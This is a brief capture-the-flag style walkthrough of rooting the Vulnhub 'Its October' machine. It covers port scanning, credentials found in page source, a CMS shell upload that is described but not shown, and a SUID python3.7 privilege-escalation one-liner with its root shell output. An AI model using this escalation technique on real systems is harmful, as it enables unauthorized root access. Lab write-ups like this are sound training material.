Its a another easy level machine of Vulnhub
Goal: Get the root flag of the target.
Difficulty: Easy/Medium Level
Lab Setup:-
Download this machine from the link and import it into the virtual box.
Now Lets find the IP of machine.
Here is my machine IP 192.168.1.205
Scanning:-
┌──(danial㉿kali)-[~/Desktop/InfosecWarrior/Its_October]
└─$ nmap -sV -sC -v -A -oA nmap -p- 192.168.1.205
Got 4 Open ports 22, 80, 3306 and 8080.
Let’s move forward with port 80
Nothing Special got a simple html template after running dirb and gobuster found only admin directory.
Leave it as of now and move forward with port 8080
got a custom page, After reviewing souce code got some creds.
Now let’s login to the cms
Now time to upload a shell.
After spending 2–3 hours got method to upload a shell, Tried with plugin method als but not worked.
Now we got a shell
After running find command got someting that attracts to me.
So i decided to move forward with python3.7
So finally got a method to root machine.
bash-5.0$ /usr/bin/python3.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
/usr/bin/python3.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
proof.txt
# cat proof.txt
cat proof.txt
Best of Luck
$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eop2ff0LbLYZrFq
Finally Got a root !!
Happy Hacking.